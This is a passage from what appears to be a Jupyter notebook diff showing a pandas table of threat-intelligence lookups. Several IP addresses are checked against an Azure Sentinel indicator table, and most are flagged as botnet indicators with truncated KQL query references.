'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '72AD9E8122E8CAA56BF8EB0642DAAE3DFCF8C869868623EBD7B9BA43E630062A', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>36</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '2E36BE6DCEACAF7491EC274718845AA84A8AE2EAE025F16DFC87B0D2DEA040DD', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>37</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '87B84EEB12E45B0AC046178C4DF3BE304534E4404891AB3B670AB337CBDC6026', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>38</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '2B3D1B719533D10EF42E0BA1948BDE099A83C38BAF53E8369CB9651A890A0CD2', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>39</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'F3DB1ED9EF6CC0C468A309198BA2526152F52D87DB4D56FA56AB43B615149186', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>40</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '3DE92C875100CC6465533A6767AEB58A202D7C347792D72F9D3B62BA93B17BD2', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>41</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '33C315E5D5D7C9466CB1F69146AD433928FF973890E2D3BDAF24C4A35A28F8AE', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>42</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'C735591AC4BB071A7FF91C7B6DFB716CB443F323B199C1E2D98E572D1E405665', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>43</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '7013C9E4A99F8869AF650FC36ACE5380C9037C3599C001B8906120A54CB6A6D2', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>44</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '681C2296F85244215361CCFB1F0863DA7BF92C42BD091E29B4BFAFFD8BE46B12', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>45</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '7C5DAF47611B1F133E76B16145E46F30F269348A9C34C51AA7FFDC5FA8A7D231', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>46</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '50CBE99DC38594E814D47C2FC3E065E434297F92927C5642706DDEDEF9100A12', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>47</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'AE3584C5872970B9B16536D5F4A39B247D52F183A34B8D0D3A501FDE1D604057', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>48</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'AF0236BB54DB7C849FEF2D6A6E63143481214566E7666B1FF8D68B099C88DB37', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>49</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'D4EEBDC99B631C24A1445A428EB0CA4AC70809C2382521B12270237862FDFAC6', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>50</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '6A131B8B9E162BB546FBC24F0563A66A0DE69105B6614E881927BB537817345B', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>51</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'C771855E8F619F1852441349C314334193E7F45A8B4A9E5A20B0FAB9DD4DF783', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>52</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'FE9F08ED47A7E93E33C91A86D9B835E6A87DDE85660E19FCE35C254DDE95C641', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>53</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '77C853D9EB8905812EEE44FCF5A7769F5E1F1CAC4CAE769FE7A33EBE5CC6EFB4', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>54</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '334D78E4F5D02FD26CF6B0A0BCFEC0272006B94BDB2622F65DCD724787CBBDC7', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>55</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': 'AA67F6A7A899FAF845E959052C30C712DC96089309CF3F41CE24368E1B4E9F3D', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>56</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '3DFA877928D3B3E4D43696BF27ACA7098523C7429E43FD439368A4535FEB1E8E', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>57</th>\n      <td>109.236.89.61</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '999F73C902C15F983A702972C30F23D1AD7DEE102BC82C4259AEAF4BB2FDA42A', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>58</th>\n      <td>146.56.231.70</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '385F55DABB06B0B7C850AB889E516E2442A1ABF7268C6408B3F136F9DF402010', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>59</th>\n      <td>146.56.231.70</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '70DD90016151A370513F852A93B5FCE681D9E01C200860BA6F12A50FABC5A702', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>60</th>\n      <td>146.56.231.70</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-04-12T11:25:07.689524Z) | w...</td>\n      <td>True</td>\n      <td>0.0</td>\n      <td>2.0</td>\n      <td>{'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...</td>\n      <td>{'IndicatorId': '6422C91AB690A6BDF52A937BF1E03A4F802546D5D5EACA011157A98DB20F590C', 'TimeGenerat...</td>\n      <td>AzSTI</td>\n    </tr>\n  </tbody>\n</table>\n</div>",
+      "text/plain": "              Ioc IocType QuerySubtype  \\\n0         1.2.3.4    ipv4         None   \n1     51.75.29.61    ipv4         None   \n2         1.2.3.5    ipv4         None   \n3   109.236.89.61    ipv4         None   \n4   109.236.89.61    ipv4         None   \n5   109.236.89.61    ipv4         None   \n6   109.236.89.61    ipv4         None   \n7   109.236.89.61    ipv4         None   \n8   109.236.89.61    ipv4         None   \n9   109.236.89.61    ipv4         None   \n10  109.236.89.61    ipv4         None   \n11  109.236.89.61    ipv4         None   \n12  109.236.89.61    ipv4         None   \n13  109.236.89.61    ipv4         None   \n14  109.236.89.61    ipv4         None   \n15  109.236.89.61    ipv4         None   \n16  109.236.89.61    ipv4         None   \n17  109.236.89.61    ipv4         None   \n18  109.236.89.61    ipv4         None   \n19  109.236.89.61    ipv4         None   \n20  109.236.89.61    ipv4         None   \n21  109.236.89.61    ipv4         None   \n22  109.236.89.61    ipv4         None   \n23  109.236.89.61    ipv4         None   \n24  109.236.89.61    ipv4         None   \n25  109.236.89.61    ipv4         None   \n26  109.236.89.61    ipv4         None   \n27  109.236.89.61    ipv4         None   \n28  109.236.89.61    ipv4         None   \n29  109.236.89.61    ipv4         None   \n30  109.236.89.61    ipv4         None   \n31  109.236.89.61    ipv4         None   \n32  109.236.89.61    ipv4         None   \n33  109.236.89.61    ipv4         None   \n34  109.236.89.61    ipv4         None   \n35  109.236.89.61    ipv4         None   \n36  109.236.89.61    ipv4         None   \n37  109.236.89.61    ipv4         None   \n38  109.236.89.61    ipv4         None   \n39  109.236.89.61    ipv4         None   \n40  109.236.89.61    ipv4         None   \n41  109.236.89.61    ipv4         None   \n42  109.236.89.61    ipv4         None   \n43  109.236.89.61    ipv4         None   \n44  109.236.89.61    ipv4         None   \n45  109.236.89.61    ipv4         None   \n46  109.236.89.61    ipv4         None   \n47  109.236.89.61    ipv4         None   \n48  109.236.89.61    ipv4         None   \n49  109.236.89.61    ipv4         None   \n50  109.236.89.61    ipv4         None   \n51  109.236.89.61    ipv4         None   \n52  109.236.89.61    ipv4         None   \n53  109.236.89.61    ipv4         None   \n54  109.236.89.61    ipv4         None   \n55  109.236.89.61    ipv4         None   \n56  109.236.89.61    ipv4         None   \n57  109.236.89.61    ipv4         None   \n58  146.56.231.70    ipv4         None   \n59  146.56.231.70    ipv4         None   \n60  146.56.231.70    ipv4         None   \n\n                                                                                              Reference  \\\n0    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n1    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n2    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n3    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n4    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n5    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n6    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n7    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n8    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n9    ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n10   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n11   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n12   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n13   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n14   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n15   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n16   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n17   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n18   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n19   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n20   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n21   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n22   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n23   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n24   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n25   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n26   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n27   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n28   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n29   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n30   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n31   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n32   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n33   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n34   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n35   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n36   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n37   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n38   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n39   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n40   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n41   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n42   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n43   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n44   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n45   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n46   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n47   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n48   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n49   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n50   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n51   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n52   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n53   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n54   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n55   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n56   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n57   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n58   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n59   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n60   ThreatIntelligenceIndicator  | where TimeGenerated >= datetime(2021-04-12T11:25:07.689524Z) | w...   \n\n    Result  Status  Severity  \\\n0    False     0.0       0.0   \n1    False     0.0       0.0   \n2    False     0.0       0.0   \n3     True     0.0       2.0   \n4     True     0.0       2.0   \n5     True     0.0       2.0   \n6     True     0.0       2.0   \n7     True     0.0       2.0   \n8     True     0.0       2.0   \n9     True     0.0       2.0   \n10    True     0.0       2.0   \n11    True     0.0       2.0   \n12    True     0.0       2.0   \n13    True     0.0       2.0   \n14    True     0.0       2.0   \n15    True     0.0       2.0   \n16    True     0.0       2.0   \n17    True     0.0       2.0   \n18    True     0.0       2.0   \n19    True     0.0       2.0   \n20    True     0.0       2.0   \n21    True     0.0       2.0   \n22    True     0.0       2.0   \n23    True     0.0       2.0   \n24    True     0.0       2.0   \n25    True     0.0       2.0   \n26    True     0.0       2.0   \n27    True     0.0       2.0   \n28    True     0.0       2.0   \n29    True     0.0       2.0   \n30    True     0.0       2.0   \n31    True     0.0       2.0   \n32    True     0.0       2.0   \n33    True     0.0       2.0   \n34    True     0.0       2.0   \n35    True     0.0       2.0   \n36    True     0.0       2.0   \n37    True     0.0       2.0   \n38    True     0.0       2.0   \n39    True     0.0       2.0   \n40    True     0.0       2.0   \n41    True     0.0       2.0   \n42    True     0.0       2.0   \n43    True     0.0       2.0   \n44    True     0.0       2.0   \n45    True     0.0       2.0   \n46    True     0.0       2.0   \n47    True     0.0       2.0   \n48    True     0.0       2.0   \n49    True     0.0       2.0   \n50    True     0.0       2.0   \n51    True     0.0       2.0   \n52    True     0.0       2.0   \n53    True     0.0       2.0   \n54    True     0.0       2.0   \n55    True     0.0       2.0   \n56    True     0.0       2.0   \n57    True     0.0       2.0   \n58    True     0.0       2.0   \n59    True     0.0       2.0   \n60    True     0.0       2.0   \n\n                                                                                                Details  \\\n0                                                                                            Not found.   \n1                                                                                            Not found.   \n2                                                                                            Not found.   \n3   {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n4   {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n5   {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n6   {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n7   {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n8   {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n9   {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n10  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n11  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n12  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n13  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n14  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n15  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n16  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n17  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n18  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n19  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n20  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n21  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n22  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n23  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n24  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n25  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n26  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n27  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n28  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n29  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n30  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n31  {'Action': 